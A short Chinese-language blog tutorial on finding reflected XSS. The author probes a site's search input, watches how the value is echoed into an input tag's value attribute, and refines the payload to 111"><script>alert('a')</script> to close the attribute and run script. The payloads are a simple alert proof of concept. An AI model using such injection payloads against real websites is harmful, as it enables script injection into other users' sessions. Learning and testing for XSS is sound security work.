xss学习之查找xss(一)

从本章开始学习xss
如何查找xss:
拿到一个网站之后,随便找一个页面测试下
查看页面源代码为:
<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111"/>
添加一些变形,随便写(这里主要是看页面时如何构造语句的):
把111变为:  111'</a
源代码:
 
<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111'</a"/>

 

可以看到111前面有个" 在/a后面还有”  这个是系统自动加的,然后系统自动增加了 />
构造xss为:首先闭合掉最开头的< 需要提交参数的时候先使用> 闭合掉
尝试提交 111><script>alert('a')</script>
源代码:
<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111><script>alert('a')</script>"/>

 

可以看到在</script>之后自动添加了"/>
这个”是跟提交数据一起的,也需要在一开始就闭合
尝试: 111"><script>alert('a')</script>
源代码:
<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111"><script>alert('a')</script>"/>

 

此时前面该闭合的都已经闭合了,最后留下了xss代码执行成功,会弹出一个对话框,内容为“a”
 
posted @ 2015-02-10 21:31  luyg24  阅读(856)  评论(0编辑  收藏  举报